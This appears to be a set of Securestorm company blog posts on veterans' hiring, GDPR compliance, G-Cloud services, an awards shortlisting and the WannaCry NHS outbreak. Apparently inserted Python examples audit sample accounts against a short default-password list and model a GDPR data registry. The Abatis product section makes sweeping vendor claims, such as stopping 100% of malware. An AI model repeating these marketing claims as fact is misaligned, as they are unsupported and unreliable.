Honouring Our Armed Forces



Securestorm has recently signed an official agreement to honour the Armed Forces Covenant.

By extending our support to the Armed Forces Community, we recognise the value that serving personnel, both Regular and Reservist, veterans and military families contribute to our business and our country. By getting directly involved with the Armed Forces Covenant, we extend and re-affirm our beliefs by actively supporting initiatives, taking up causes and voicing their messages in our actions.

Embedding the 'Core' Principles in Our Culture

Our Armed Forces fulfil the responsibility of protecting the realm on behalf of the Government, sacrificing some civilian freedoms, facing danger and, sometimes, suffering serious injury or death as a result of their duty. Families also play a vital role in supporting the operational effectiveness of our Armed Forces. In return, the whole nation has a moral obligation to the members of the Naval Service, the Army and the Royal Air Force, together with their families. They deserve our respect and support, and fair treatment.

"We (Securestorm Ltd.) will endeavour in our business dealings to uphold the key principles of the Armed Forces Covenant"

Securestorm not only acknowledges this agreement as an initiative but also holds these values deep within the company culture and origins. In fact, Securestorm Co-founder & CTO, Tony Richards served in the armed forces before making his mark on the Cloud & Cyber Security domains as an industry leader & strategist, especially working alongside and solving challenges for Public Sector organisations like the Ministry of Justice, Youth Justice Board, Supreme Court, and GDS, to name a few.

Showing Commitment & Support in Our Actions

As part of our ongoing commitment we particularly seek to support the employment of veterans, young and old, by actively targeting veterans in employment campaigns, actively supporting industry training and work placement schemes, and mentoring veterans within the industry.

"We (Securestorm Ltd.) recognise the value serving personnel, reservists, veterans and military families bring to our business"

Drawing on our expertise and specialism in the security field, and using our partnership with organisations like Amazon Web Services, we are able to contribute to important schemes like AWS re:Start. We recently hired and mentored a young veteran who is now on the path to becoming a Cyber Security Consultant. Along the way, he received regular support, technical training and qualifications, customer-facing experience and an all-important work contract from Securestorm. You can read about his journey below:

'A Veteran's Journey to Civilian Life'



Tony Richards commented: "With years of experience in the army as well as working in a trending industry, my team and I are able to provide the 'right' nurturing and 'balanced' mentorship required to help the members of Armed Forces pick up and apply new skills suited to them as well as transition back to civilian life. We have already seen some great success in our involvement and we will continually do so in all our future endeavours".

We also take this opportunity to encourage other organisations and associates in our community to support and take up this cause of supporting the AFC. This goes beyond getting veterans back to normal life as the industry needs to recognize what they have to offer. There is a big opportunity to fully develop veterans’ skills and train them to be specialists in order to meet the rising national skills shortage in technology, particularly the vast field of Cyber and Cloud Security.

For more information on our involvement with the AFC or opportunities for Armed Forces, please get in touch with us on enquiries@securestorm.com. Don't forget to visit our other helpful content and handy resources:



Cost Effective GDPR Compliance for SMEs



According to the latest survey results, the majority of SME businesses are unsure about meeting the GDPR compliance deadline. Moreover, a large part of the business community is unsure of the overall relevance of GDPR to their core business model and operations as well as the overall cost of compliance and business disruption it may cause.

So what should businesses do?



  • Determine the relevance of GDPR to your business and operating model: GDPR is not about data protection, it is about personal data protection. It is important that businesses determine the degree of personal data they use. 

Actual personal data usage may be very different from perception. For example, a simple weather updates portal does not need any personal customer data, yet it does store and process the names, addresses, family details, bank account numbers, passport details, work authorisations, salaries, bonus payments and sick leave details of its 50 geographically spread agents. All of these are personal data and some are sensitive data.

  • Reorganise asset ownership and limit liabilities: SME owners should take advice on reorganising their business ownership and asset ownership. Numerous businesses start as a one-person idea and then evolve to become a small team. But, through digital connectivity or a people-based operating model, they collect significant personal data. Owning sensitive assets, with the associated compliance obligations and liabilities, is best addressed by forming corporate entities and limiting individual liability. 

The corporate entity should be the owner of share capital and owner of assets including data/digital assets – even if the product is an app available online with a relatively small number of users.

  • Consolidate data ownership: Personal data is an essential element of business flow. Many SMEs use online software-as-a-service tools to manage their business processes and since one tool may not give them all functionalities, data often resides in multiple sets. It’s therefore critical that businesses build their data asset inventory and document who is owner/active custodian of data sets available. 

This is good business practice and will support GDPR and other compliance objectives.



  • Establish and evaluate scope of compliance: Consult your legal advisor to determine your scope of compliance. SMEs often operate as virtual organizations with staff working in different geographies and governed under different cyber security and data protection laws. Similarly, digital product consumption is global. It is therefore critical that SMEs draw a clear scope of compliance.

The scope of compliance needs to be evaluated to identify possible risk avoidance strategies, for example switching to a same country cloud service provider. Why climb the hill when you can go around it?

  • Determine optimum compliance budget: Businesses need to establish an optimum compliance budget. It is important that management considers the overall scale, sensitivity and competition parameters of its personal data use. If a business uses significant personal data then GDPR compliance is a necessity. If, however, GDPR compliance is also expected to offer competitive advantage, then it is important to have the marketing team on board and share some costs. Organisations can subscribe to numerous GDPR compliance services rather than making capital investments.


  • Evaluate “DPO as a service”: GDPR requires an organisation to appoint a person to the position of Data Protection Officer (DPO). But it gives flexibility for the DPO position to be a full-time, part-time, shared or contract resource. In order to reduce cost whilst maintaining compliance, SMEs must explore the option of appointing a shared DPO.

The DPO credential requirements are quite unique and “DPO as a service” provides SMEs the most efficient and practical support on compliance. The business should evaluate the DPO’s personal competence, intellectual property and support team available to address the variety of challenges that GDPR compliance is expected to present.

  • Move to a managed service model with suppliers and insist on their GDPR readiness: Outsourcing or specialised sourcing is a great way of achieving efficiency and business compliance. Because cost overheads are shared, the impact of any particular compliance requirement drops significantly. In line with this strategy, organisations should move to a managed service model for the parts of their business operations which fit their outsourcing strategy. During the implementation of a managed service strategy as a business or efficiency initiative, specialised focus should be given to compliance. This should be reflected in the contractual terms that are entered into as well as in the governance framework for performance management. 

The data controller remains accountable, but sourcing a specialised and compliant data processor may relieve management of large recurring compliance investments.

  • Market your GDPR compliance as a competitive strength: SMEs need to market the GDPR compliance of their product and business to gain competitive leverage. Large businesses have much more at stake in terms of penalties and brand loss, but they also have compliance budgets and programmes for internal systems and processes. These compliance programmes include ensuring current and prospective suppliers are GDPR compliant.

Being ahead in the race for compliance, and marketing it as a strength, avoids elimination on compliance grounds and lends a powerful advantage during techno-commercial negotiations.

  • Implement cyber security hygiene practices: Regulatory (ICO) wrath will originate from two main sources: a serious complaint from a data subject about systemic non-compliance, or a security incident in which personal data is leaked and individual privacy is affected. It is therefore important to note that more than 70% of security incidents result from weak implementation of security basics, e.g. “admin-admin” username-password combinations, outdated unpatched systems, shared passwords, firewall any-any configurations, access beyond what the role or need requires, insider collusion, etc. 

Implementation of good security basics (refer to Cyber Essentials ©) which includes managerial and technical controls gives moderately strong data protection assurance to business management and will shield against higher penalties.
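The "security basics" named above are all checkable. The script below, added here as an illustration and not Securestorm's own tooling, audits a constructed inventory (sample firewall rules, accounts, role baseline and patch dates, none of them real) for any-any allow rules, default or shared credentials, permissions beyond the role baseline, and systems outside the patch window; all names and thresholds are the example's own assumptions.

```python
"""Audit a constructed inventory for common 'security basics' failures."""
from collections import defaultdict
from datetime import date

AS_OF = date(2018, 3, 20)          # constructed 'today' for the patch-age check
MAX_PATCH_AGE_DAYS = 30            # assumed patch window

# Constructed sample data (no real hosts, users or secrets)
FIREWALL_RULES = [
    {"id": 1, "src": "any", "dst": "any", "port": "any", "action": "allow"},   # any-any allow
    {"id": 2, "src": "10.0.1.0/24", "dst": "10.0.2.10", "port": "443", "action": "allow"},
    {"id": 3, "src": "0.0.0.0/0", "dst": "10.0.2.10", "port": "any", "action": "allow"},
    {"id": 4, "src": "any", "dst": "any", "port": "any", "action": "deny"},    # default deny is fine
]
ACCOUNTS = [
    {"user": "admin", "password": "admin", "role": "administrator", "perms": {"read", "write", "admin"}},
    {"user": "jsmith", "password": "Wq8!vL2#pR", "role": "analyst", "perms": {"read", "write", "admin"}},
    {"user": "svc_backup", "password": "backup", "role": "service", "perms": {"read"}},
    {"user": "agent07", "password": "SharedTeamPw1", "role": "agent", "perms": {"read"}},
    {"user": "agent08", "password": "SharedTeamPw1", "role": "agent", "perms": {"read"}},
]
SYSTEMS = [
    {"host": "web01", "last_patched": date(2018, 3, 1)},
    {"host": "db01", "last_patched": date(2017, 9, 15)},
]
# What each role actually needs (assumed baseline for this example)
ROLE_BASELINE = {"administrator": {"read", "write", "admin"}, "analyst": {"read", "write"},
                 "service": {"read"}, "agent": {"read"}}
DEFAULT_PASSWORDS = {"", "admin", "password", "123456", "backup", "changeme"}


def _is_any(value):
    return str(value).strip().lower() in {"any", "*", "0.0.0.0/0"}


def find_any_any_rules(rules):
    """Allow rules that match every source, destination and port."""
    return [r["id"] for r in rules
            if r["action"] == "allow" and all(_is_any(r[k]) for k in ("src", "dst", "port"))]


def find_default_credentials(accounts):
    """Accounts whose password is a well-known default or equals the username."""
    return [a["user"] for a in accounts
            if a["password"] in DEFAULT_PASSWORDS or a["password"] == a["user"]]


def find_shared_passwords(accounts):
    """Groups of accounts that share a single password."""
    by_pw = defaultdict(list)
    for a in accounts:
        by_pw[a["password"]].append(a["user"])
    return [sorted(users) for users in by_pw.values() if len(users) > 1]


def find_excess_privileges(accounts, baseline):
    """Permissions held beyond what the account's role needs."""
    return {a["user"]: sorted(a["perms"] - baseline[a["role"]])
            for a in accounts if a["perms"] - baseline[a["role"]]}


def find_unpatched(systems, as_of, max_age_days):
    """Hosts whose last patch date is older than the allowed window."""
    return [s["host"] for s in systems if (as_of - s["last_patched"]).days > max_age_days]


def audit(rules=FIREWALL_RULES, accounts=ACCOUNTS, systems=SYSTEMS, as_of=AS_OF):
    """Run every check and return the findings keyed by check name."""
    return {
        "any_any_rules": find_any_any_rules(rules),
        "default_credentials": find_default_credentials(accounts),
        "shared_passwords": find_shared_passwords(accounts),
        "excess_privileges": find_excess_privileges(accounts, ROLE_BASELINE),
        "unpatched": find_unpatched(systems, as_of, MAX_PATCH_AGE_DAYS),
    }


if __name__ == "__main__":
    for finding, items in audit().items():
        print(f"{finding}: {items}")
```

Rule 3 is deliberately not flagged: it is open on source and port but pinned to one destination, so a reviewer would judge it on its own rather than as an any-any rule. In practice the sample dictionaries would be replaced by exports from the firewall, directory and patch-management systems.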

  • Take insurance cover: If the business is focussed on personal data, it is critically important that the organisation has cyber insurance cover. 

This cost will provide the necessary oxygen in case of multiple control failures. With a constant rise in cyber incidents and higher participation of insider agents (employees, ex-employees, suppliers' staff), data leakage by error can lead to fines, loss of goodwill, disruption of operations and significant erosion of customer confidence and revenue. There could be additional liabilities emerging from suits filed by customers, investors or partners.



  • Embrace privacy by design: SMEs need to make a fundamental shift in data governance. Their products, processes and customer interactions need to respect personal data from collection to disposal. They need to evaluate the concepts of data minimisation, data segregation, data retention, identity management, disclosures, consent and lawful/agreed processing norms. The concept of the data-lean organisation needs to be implemented.

This is a cultural change which DPOs are expected to drive as they operationalise their roles for GDPR compliance.

Check out our content & resources:


GDPR will drive "Data Lean" Organisations




A Driving Force of 'DATA LEAN' Organisations

GDPR presents a unique opportunity for organisations to benefit from becoming “Data Lean”. This is a complete reversal of the current business mind-set where organisations collect maximum data about their current and potential customers because they believe it helps them to understand their needs better. The days of unauthorised data mining for upselling / cross selling certainly are numbered.

GDPR compliance necessitates organisations to change their business practices and data management systems. For example:

  1. Data Minimisation: The concept of data minimisation requires that only the data necessary and relevant to the business objective of the activity is collected. Today organisations manually and automatically collect unnecessary data from customers so that they have the option to mine it for future business purposes. Under GDPR, data controllers are prohibited from collecting unjustified large data sets.
  2. Rights of Data Subjects & Responsibilities of Organisations: GDPR grants individuals the right to enquire about and receive all of the personal details the organisation holds on them, to be provided within 30 days. Similarly, the individual's right to be forgotten means an individual may demand deletion of all his/her personal data in all systems held by the organisation. In order to comply, organisations will need all of their databases that contain personal data to be integrated or centrally managed across modern and legacy systems. Hence the fewer the databases that store personal data, the simpler life is for data controllers and processors.
  3. Data Processing, Sharing & Consent: GDPR requires organisations to seek individual consent for the purpose(s) for which personal data shall be used. It also requires explicit consent for sharing data with third parties and associates. Specific and explicit consent provisions tie the hands of organisations that would apply “creative analytics” to personal data. It also limits an organisation's freedom to form data partnerships for cross-selling. Stretching the use of data to gain marketing leverage would certainly encourage individuals to use their right to object and/or withdraw consent.
  4. Data Relevance and Deletion: GDPR requires organisations to inform individuals, at the time of collection, how long their personal data shall be retained. To comply, organisations will need to establish the useful life of data before the collection activity and delete the data once the committed time-frame has elapsed. Alternatively, individuals are empowered to demand deletion at any time. This balance of rights ensures that organisations keep only relevant data and adopt an effective data deletion policy.
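The four points above translate directly into mechanics. The following registry, added here as a worked example (not Securestorm's code, with class names, purposes and sample records all constructed for the illustration), enforces data minimisation against a declared purpose, refuses collection without consent for that purpose, answers a subject access request and an erasure request across every store in the inventory, and deletes records whose committed retention period has passed.

```python
"""A minimal 'data lean' personal-data registry (added example, constructed data)."""
from dataclasses import dataclass
from datetime import date, timedelta

PURGE_AS_OF = date(2018, 3, 1)     # constructed 'today' for the retention run


@dataclass
class Record:
    subject_id: str
    purpose: str
    data: dict
    collected_at: date
    retention_days: int            # the period promised to the subject at collection

    def expired(self, as_of):
        return self.collected_at + timedelta(days=self.retention_days) < as_of


class DataStore:
    """One system holding personal data, e.g. a CRM or a newsletter tool."""

    def __init__(self, name, allowed_fields):
        self.name = name
        self.allowed_fields = allowed_fields   # purpose -> set of fields needed for it
        self.records = []

    def collect(self, subject_id, purpose, data, consents, collected_at, retention_days):
        if purpose not in self.allowed_fields:
            raise ValueError(f"{self.name}: no declared purpose {purpose!r}")
        if purpose not in consents:                       # explicit consent per purpose
            raise PermissionError(f"{self.name}: no consent for {purpose!r}")
        extra = set(data) - self.allowed_fields[purpose]  # data minimisation
        if extra:
            raise ValueError(f"{self.name}: fields {sorted(extra)} not needed for {purpose!r}")
        self.records.append(Record(subject_id, purpose, dict(data), collected_at, retention_days))

    def export(self, subject_id):
        """Everything held on one subject, for a subject access request."""
        return [{"purpose": r.purpose, "data": dict(r.data), "collected_at": r.collected_at.isoformat()}
                for r in self.records if r.subject_id == subject_id]

    def erase(self, subject_id):
        """Right to be forgotten: returns the number of records removed."""
        before = len(self.records)
        self.records = [r for r in self.records if r.subject_id != subject_id]
        return before - len(self.records)

    def purge_expired(self, as_of):
        """Retention: delete records past their committed time-frame."""
        before = len(self.records)
        self.records = [r for r in self.records if not r.expired(as_of)]
        return before - len(self.records)


class DataRegistry:
    """Inventory of every store holding personal data, so subject rights reach all of them."""

    def __init__(self, stores):
        self.stores = {s.name: s for s in stores}

    def subject_access_request(self, subject_id):
        found = {n: s.export(subject_id) for n, s in self.stores.items()}
        return {n: recs for n, recs in found.items() if recs}

    def right_to_be_forgotten(self, subject_id):
        return {n: s.erase(subject_id) for n, s in self.stores.items()}

    def purge_expired(self, as_of):
        return {n: s.purge_expired(as_of) for n, s in self.stores.items()}


def build_sample_registry():
    """Two constructed stores with three constructed records."""
    crm = DataStore("crm", {"order_fulfilment": {"name", "address"}})
    news = DataStore("newsletter", {"marketing": {"email"}})
    both = {"order_fulfilment", "marketing"}
    crm.collect("s1", "order_fulfilment", {"name": "A. Example", "address": "1 Sample St"},
                both, date(2018, 1, 10), retention_days=365)
    news.collect("s1", "marketing", {"email": "a@example.invalid"}, both, date(2018, 1, 10), 30)
    news.collect("s2", "marketing", {"email": "b@example.invalid"}, {"marketing"}, date(2018, 4, 1), 30)
    return DataRegistry([crm, news])


if __name__ == "__main__":
    reg = build_sample_registry()
    print(reg.subject_access_request("s1"))
    print(reg.purge_expired(PURGE_AS_OF))     # s1's 30-day newsletter record is gone
    print(reg.right_to_be_forgotten("s1"))
```

The registry is the piece most SMEs lack: without an inventory of every store, an erasure request can only be honoured in the systems someone remembers.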

GDPR compliance will drive organisations to maintain only the personal data they need for agreed business purposes. While the cost of storing data is declining, the cost of managing and safeguarding it is not.

The advantages of becoming “Data Lean” include limited exposure to data loss issues, customer liabilities, regulatory wrath and goodwill damages as well as reduced cyber insurance premiums for compliant organisations.

Susheem Grover


Susheem is a Lead Consultant with 15 years of experience in Risk Management and Business Transformation Advisory with the services industries. He is a specialist in the GDPR and EU privacy regulations.




GDPR: Force for Good or an Evil Necessity ?



GDPR: Force for 'Good' or an 'Evil' Necessity

by Alex Pavlovic - GDPR 'Strategist'

For those of you who were involved in the much maligned and, at the time, over-hyped Y2K or the ‘Millennium Bug’ you could be excused for thinking that with the General Data Protection Regulation (GDPR) there is a sense of déjà vu. 

The “It’ll never happen” versus the “sky is falling on our heads” camps seem to be resurfacing.


It’s been 20ish years since the Y2K project work started. I worked in a trading floor environment at the time and there was a huge, aka expensive, project to identify systems and processes impacted by the date change; the risks of doing nothing far outweighed the investment. Quite a few instances were discovered and we did identify issues with hardware and software.

Was it the end of the world like some predicted: No
Would it have impacted operations on January 2nd until they were fixed: Yes.  
Would we have been able to trade: hmm, tricky - quite a few database and spreadsheet issues were identified. But was it a timely overhaul of outdated systems and processes: Yes.

What the lead-up to Y2K did do was focus staff's, and most importantly the executives' and senior management's, attention on the risks and impact of not doing anything. Sound similar to some current conversations?
The risks of doing nothing far outweighed the investment; at the time there were early and late remediation adopters.

Did that result in getting systems, infrastructure and controls updated (things which IT had been crying out for): Yes.


GDPR has rightly been identified and embraced by organisations (it could be said, long overdue) and plans are finally being developed to rectify the omissions in technical and organisational controls/measures. High profile projects once again have the Executives’ attention and support, albeit grudgingly in some cases.  Commitment for resource and budgets are once again being given and remediation work has commenced.  


If the controls aren’t implemented will it be the end of the world: No, though it could knock a hole in a company's finances.
Will it impact operations: it could do if a regulator orders a company to halt processing.
Will it be a timely overhaul of outdated systems and processes: I certainly hope so!

Thoughts?
Leave your comments down below...



GDPR 'Strategist' &
Lead Consultant

Alex is a Lead Consultant with 25 years of IT, Audit, Information Security and Risk Management experience. He is a specialist in the GDPR and is an advisor and implementation manager for multiple clients across a wide range of industries.

If you are interested to run or participate in GDPR sessions, contact: alex@securestorm.com 

Visit our content:



Cloud Champion



Meet techUK's 'Cloud Champion'

Cloud is fundamental to the UK’s digital future. But an organisation’s decision to move to the cloud will mean organisational change, leaving employees, particularly IT professionals, feeling anxious about how the cloud will affect the way they work. For many this will be a significant step change and cultural shift in how IT services are consumed. If it is not properly managed, organisations could struggle to realise the full potential of cloud.

The purpose of techUK’s ‘Cloud Champion’ campaign is to showcase technology leaders who are playing a leadership role in championing and supporting organisations’ move to the cloud. The campaign will highlight best practice by leaders who are creating cloud-enabled organisations, across all sectors, and a cloud-driven workforce that will be vital for the UK’s digital future.

Securestorm are techUK members and fully support the organisation's wider initiatives by participating in meaningful dialogue, strategy measures and thought leadership. Read the recent coverage about the 'Trust In Cloud' initiative and access the research papers here.

About: Securestorm are dynamic cyber security experts who deliver practical advice with the aim of meeting and solving challenges across the Cloud and Cyber Security domains. With a combination of experience, expertise and strategy, Securestorm offers guidance to clients across the Public and Private sectors.
Securestorm holds several accreditations, notably being an NCSC Certified Cyber Security Consultancy, a Crown Commercial Supplier, and ISO 27001 certified. Furthermore, Securestorm is also prominent in the industry for its proven delivery capabilities.


Meet Chris: Army Combat Engineer to Cyber Security Professional



A Veteran's Journey to Civilian Life

Chris Smith, Royal Engineer, British Army

When Chris Smith, a Royal Engineer veteran, left the military recently he wasn't sure what to do next — a dilemma for many former military personnel.

But Chris eventually found his calling in the technology industry, and is now rapidly making the transition from military life to the professional services environment.  

Chris's move into technology began when he enrolled into the AWS re:Start initiative where his interest in the area of Cyber Security got him a work placement with Securestorm Ltd.

Chris said, "I was initially lost, but once I found out about the opportunities within Cyber Security and the support available to me, I knew this was my future. The Securestorm placement combined with the AWS re:Start initiative gave me direction, confidence and reassurance, which is vital to anyone who is coming out of the military and pursuing a completely new avenue. Most folks do not realise how daunting the transition to civilian life can be!"

Army Engineer - Typical Day in the Army

On a 'Mission' - Military Life

Chris is now a Security Analyst for Securestorm Ltd., the leading Cloud and Cyber Security consultancy based in London. As a National Cyber Security Centre (NCSC) certified organisation, Securestorm works closely with public and private sector clients, advising on security matters. This gives veterans like Chris first-hand working experience in a diverse setting and all-round exposure to various customers across the industry.

Giving Veterans a Fresh Start in Technology

Building Talents: The AWS re:Start Programme for Military & Securestorm Placement Program

AWS re:Start for Military is aimed at supporting members of the UK Armed Forces community with a training and job placement programme. The programme is designed to educate young adults, military veterans, members of the military reserve, those leaving the Armed Forces, and service spouses on the latest software development and cloud computing technologies. Securestorm are AWS partners and are heavily involved in helping new minds get the necessary training, education and development to make it in the field of Security.


Interview: Meet the Recent Graduates

As the visionary head of Securestorm, CEO Mandeep Obhrai stated, "We are committed to our partnership with AWS as we embark on diverse initiatives from bringing innovative security solutions to supporting the community around us through a well-developed training and placement program. As a start-up with multiple achievements in our sector, we can help inspire, motivate and mentor new starters in technology on a very personal level with adequate support and nurturing along the way".
Army veteran turned leading Cyber & Cloud strategist Tony Richards, CTO & CISO of Securestorm, said, "While most former military personnel do not have cyber-security training, they do have compatible skills, teamwork spirit and are extremely focused by nature. These qualities are essential to our industry. Being receptive to learning, development and mentorship is perhaps more important than having only technical skills, especially considering the fast-paced changes in the digital cyber industry."

AWS Summit 2017 - CTO/CISO Tony Richards with AWS re:Start hire Chris Smith

He also added, "We have a collective role to provide support for veterans. At Securestorm, we believe in building upon initiatives such as the AWS re:Start. This goes beyond getting veterans back to normal life as the industry needs to recognize what they have to offer. There is a big opportunity to fully develop veterans’ skills and train them to be specialists in order to meet the rising national skills shortage in technology, particularly the vast field of Cyber and Cloud Security."

Get involved with us!

As part of our commitment to the industry, Securestorm provides a broad range of training, learning and development initiatives for our people to achieve their career goals.

For questions and queries related to Security advice or interviews please email: enquiries@securestorm.com. For current employment opportunities email: careers@securestorm.com.


On Cloud 9



No. 9 brings a single iteration of 'G-Cloud'

G9 has officially replaced G-Cloud 7 (G7) and G-Cloud 8 (G8), providing consistent information about all services and bringing more of the G-Cloud buying journey online.

Buyers and suppliers will be able to use one set of contracts for all their G-Cloud services.

Securestorm on G-Cloud 9

Securestorm has officially been awarded G-Cloud 9 status following the success of the previous G-Cloud versions. Securestorm is committed to bringing innovative, cost-effective and practical solutions and services that help Government organisations stay secure from cyber-threats as well as manage resources effectively.

Securestorm CTO Tony Richards added: "It is great to be live on G9. Keeping in line with the launch of previous G-Cloud iterations, Securestorm is further committed to delivering more, offering streamlined services and exclusive solutions such as the award-winning Edgescan. This, combined with our industry experience, delivery capabilities and subject matter expertise on trending threats, will no doubt once again see us successfully solving security challenges for our clients across the Government."

The following services by Securestorm can be found on the Digital Marketplace:




Cloud services such as Amazon Web Services or Salesforce are increasingly being used but often do not utilize all of the security options available.

Securestorm, an NCSC certified Cyber Security Consultancy, assists customers in defining their security needs and designing and assuring security of public, private or hybrid cloud services.


  • Certified under the NCSC Cyber Security Consultancy scheme
  • AWS Partner
  • Certified (CCP) Cyber Security Professionals
  • Cloud Security Alliance STAR Lead Auditors
  • (ISC)2 Certified Cloud Security Professionals (CCSP)
  • Cyber Essentials certified company
  • AWS secure for OFFICIAL architectural design and CloudFormation templates
  • Leaders in secure OFFICIAL environment architecture design and review
  • Review of AWS or Salesforce Identity & Access Management permissions
  • Review of security options chosen, and those available, against best practices
  • Assessment and review of AWS instances and configurations


  • Company certified under the NCSC Cyber Security Consultancy scheme
  • Deep dive Security Assurance and Audit previously conducted of AWS
  • Ensures compliant and secure cloud services for your organisational needs
  • Utilising the inherent security of cloud services for reduced complexity
  • Understanding of security options for current or future deployments
  • Recommendations for user role and privileges to meet business requirements
  • Improved audit and incident response capability
  • Expertise in delivering secure cloud services to existing G-Cloud customers
  • Deep dive Security Assurance and Audit previously conducted of Salesforce

Securestorm are actively working to champion Cloud Security best practices that enable Government and businesses to run more efficiently and cost-effectively. Read about our contribution and best practices in recently published research papers:



Edgescan - Continuous Technical Security Vulnerability Assessment

Edgescan is a managed Continuous Technical Security Vulnerability Assessment service with continuous security testing and system visibility that delivers a unique service combining full-stack vulnerability management, asset profiling, alerting and risk metrics. As official partners, Securestorm, an NCSC certified company, will assist customers with on-boarding the service and portal configuration.





Knack - "Low Code" Application and Database Pilot Development platform

Knack is an easy-to-use "Low-Code" development platform that Securestorm can provide as a pilot development service, letting you quickly build online applications and databases as proofs of concept. With Knack you can structure data, connect it by linking related records together, and extend it with data integrations.

Knack Low Code Development Platform Consultancy

Securestorm provides expert consultancy on how to use Knack, the "Low-Code" development platform, including: setup, configuration, management and development. Knack is an easy to use "Low-Code development platform", suitable for OFFICIAL information, that transforms data into powerful online databases, with clean interfaces, and requires no coding.




Nol-ij, the Continuous Information Risk Management Dashboard

Nol-ij is a cost effective, Continuous Information Risk Management Dashboard, that supports and streamlines governance, information risk management and security assurance through identification, evaluation, treatment and management of strategic, operational and project security risks, ensuring decision makers have the necessary information at their fingertips to confidently manage their risk portfolio.

Nol-ij Configuration, Customisation and Support Consultancy

Nol-ij, the Continuous Information Risk Assessment Dashboard can help organisations identify, track and minimize the information risks inherent in their systems and services. Securestorm provides expert consultancy to assist and enable organisations to setup, configure or even adapt and customize the Dashboard to their needs.



To request additional information on any services tailored to your organisation's infrastructure, budget and considerations, please get in touch via enquiries@securestorm.com or call 0203 8655890 for advice and consultation. Additionally, visit our technology services directory www.Informd.Online to view assurance report services.


Road to Victory


Road to Victory


Securestorm Ltd. are pleased to announce that they have been selected as finalists for Consulting Practice of the Year at the 2017 Cyber Security Awards. The Cyber Security Awards were established in 2014 to reward the best individuals, teams and companies within the cyber security industry. Excellence and innovation are core themes throughout all categories. The Cyber Security Awards team reviews the industry, looking for the best possible applicants.

The winners will be announced at the Cyber Security Awards dinner and presentation at the Chelsea Harbour Hotel on Thursday 29th June 2017.

Awards judge Karla Jobling said: “There were more applicants this year than ever before and to be selected as a finalist is a great achievement. The Cyber Security Awards really focus on success and innovation, and we look for those who have passion for what they are achieving within Cyber Security. I am excited to celebrate with all finalists in June, and announce those that judges feel are deserving winners.”

Mandeep Obhrai, CEO Securestorm stated "We are proud to be finalists for the best consulting practice of the year.  Over the past few years cyber-threats have evolved and we have been marking our success based on how we have delivered practical solutions to critical cyber challenges faced by our high-profile clients. This approach has carried us far and earned us the title of being the industry experts." 

Tony Richards, CTO Securestorm said on the occasion "This is a good motivation for our achievements. We have been hard at work getting on-board a number of specialist Cyber Security frameworks and among the few who are NCSC Certified for various cyber security services from the very start. We hope to use this news to fuel our drive for furthering our technical expertise in the industry."

About the Cyber Security Awards

Situated at the luxury 5* Chelsea Harbour Hotel, London, the Cyber Security Awards is a leading awards event for the cyber security industry. The event consists of reception drinks and a three-course meal with wine, coffee and petit fours. The Cyber Security Awards is the ideal event to gain recognition for your success within the cyber security industry. At the awards, you can expect to network with leading industry professionals from consultancies, technology firms, defence businesses, FTSE 250 companies and public sector bodies.

About Securestorm

Securestorm Ltd. are leading cyber security experts who provide practical advice with the aim of simplifying challenges in the domains of Cloud and Cyber Security. With a combination of experience, expertise and strategy, Securestorm brings innovative delivery and subject matter expertise to the industry across the Public and Private sectors. Securestorm is an NCSC Certified Cyber Security Consultancy for Risk Assessment, Risk Management, and Audit & Review. Furthermore, Securestorm is an approved Crown Commercial Service (CCS) supplier, CESG Certified, a Cyber Essentials and ISO 27001 certified consultancy, and present on the G-Cloud, Cyber Security Services 2 and Digital Outcomes and Specialists 2 frameworks.


State of Malware



'Ransomware' got the nation talking


The NHS cyber-attack that hit hospitals across the UK is said to have been part of the biggest ransomware outbreak in history, and it could ramp up again this week as people return to work. UK hospitals have effectively shut down and are turning away non-emergency patients after ransomware ransacked their networks.

Some 16 NHS organisations, including several hospital trusts, have had their files scrambled by a variant of the WannaCrypt (aka WanaCrypt, aka Wcry) malware. Users are told to cough up $300 in Bitcoin to restore their documents. Services in other countries, including Russia, Taiwan and Kazakhstan, were also affected by the same campaign. Experts say the malware spreads by exploiting a vulnerability in Microsoft Windows that was first identified by the NSA.

Doctors have been reduced to using pen and paper, and closing A&E to non-critical patients, amid the tech blackout. Ambulances have been redirected to other hospitals, and operations canceled.

Industry Experts' Analysis


Securestorm's approach to tackling high-impact attacks such as the NHS breach is the same one that has proven effective with other high-profile organisations. We look at problems practically and holistically. This enables us to deliver an innovative, tailored approach that suits the organisation while taking account of resources and other factors such as cost and time.


Tony Richards, CTO of Securestorm, who works alongside Government organisations and has been monitoring and advising organisations on defending against such attacks, added: "Microsoft released a fix, or patch, for the issue in March prior to the dump. However computers that did not install the update, or could not due to the age of the software, would have been left vulnerable to an attack". He also stated that the use of Abatis HDF software would have helped these organisations protect and defend against the very same attacks while proving cost-effective at the same time. Subsequently, he tweeted:

Mandeep Obhrai, CEO of Securestorm analysed the importance of long-term organisational planning along with embedding a security culture that is practical. He recommends:

  • Robust business continuity planning
  • Crisis and incident response planning
  • Excellent security hygiene policies and user awareness 
  • Up-to-date patch and vulnerability management 
  • Access control and user privileges are important
  • Back-up data using a reliable solution for protection

'Beating ransomware is about preventing it rather than reacting to it. Invest in awesome Cyber Security !' 
- Mandeep Obhrai, CEO

Securestorm can offer expert advice and consultancy services to organisations while developing their overall security posture, maturity and culture. We have led, integrated with and supported multiple teams within organisations to make them cyber ready. There is no one-stop solution for incidents, but this is where consulting us benefits organisations, as we are accredited and experienced to look adeptly into different areas. Read about our case studies here.

For the ransomware incident, we have identified Abatis software as one possible defensive solution. The following are the features and benefits of this particular software.

‘A Disruptive Zero Day Defence’ solution against hackers



Securestorm Ltd., London based Cloud and Cyber security experts and NCSC Certified Consultants have officially partnered up with ABATIS, a UK based Cyber Security Awards 2015: Innovative Product of the Year winner to offer a resilient, cost-effective and agile solution that stops zero day attacks.

Abatis is deployed on end point workstations and servers to enforce corporate security policy and provides detailed analysis and audit information.

  • Less than 100KB kernel-level protection
  • Preserves the integrity of whatever device it is installed upon
  • Protects all Windows and Red Hat Linux systems
  • "Effective at stopping all attempts to write malware to the permanent storage of the device regardless of system privilege"
  • "Abatis stopped 100% of all malware in comparative tests where 8 well-known anti-virus tools scored between 30% and 55%"
  • Provides an APT hunter-killer ability not seen in any other tool
  • Safe to use in mission- and safety-critical real-time systems and SCADA environments
  • Provides total control over USB devices




"Defence Against Crypto Locker and Other Ransomware"

Ransomware is one of the fastest growing methods for cyber criminals to extort money from their victims. In the first six months of 2014 cyber criminals made over $100 million in extortion; many of these victims had no option but to pay up or lose sensitive corporate information. Abatis stops these attacks dead.




Fast, Light and Efficient

  • "Saves 7% of the energy consumed by the device, servers run 8°C cooler, saving £35 / €50 / US$60 per server per annum”
  • Imperceptible performance impact
